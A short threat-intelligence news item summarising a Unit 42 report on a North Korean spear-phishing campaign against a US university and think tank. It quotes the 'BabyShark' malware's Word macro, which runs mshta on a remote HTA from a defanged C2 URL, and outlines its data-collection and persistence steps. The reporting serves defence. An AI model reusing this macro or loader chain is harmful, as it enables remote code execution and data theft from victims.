DPRK Threat Actor Targets US Think Tanks

Palo Alto Networks Unit 42 reported a spear-phishing campaign targeting a US-based university and a US-based think tank. The threat actors impersonated a US national security expert and sent spear-phishing emails with malicious decoy documents attached. Some of these documents were not publicly available indicating the probable compromise of a user with privileged access to confidential documents at a think tank.

The decoy documents contained a macro that, when executed, launched a Microsoft Visual Basic script-based malware family called “BabyShark.”

Sub AutoOpen() 
Shell (“mshta https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta”) 
End Sub 

The macro launches the HTML Application at the above location before sending an HTTP GET request to another location on the same C2 server. Next, the response traffic from the C2 server is decoded and registry keys are modified to enable all macros for Microsoft Word and Excel. A series of Windows commands are then executed to gather system information, encoded, and sent to the C2 server via HTTP POST request. Finally, registry keys are modified to maintain persistence and wait further instructions from the C2. The full write up, including IOC, can be found at the Unit 42 report.

This spear-phishing campaign was targeting a US-based university that was scheduled to hold a conference regarding DPRK denuclearization, and a US-based think tank where the impersonated email account owner previously worked. The Unit 42 report underscores two important reminders for DPRK watchers and the general public.

1. Never open an email attachment, even from a person you trust, unless you are expecting that particular email
2. The DPRK remains a committed cyber threat actor to US persons, especially those interested in DPRK denuclearization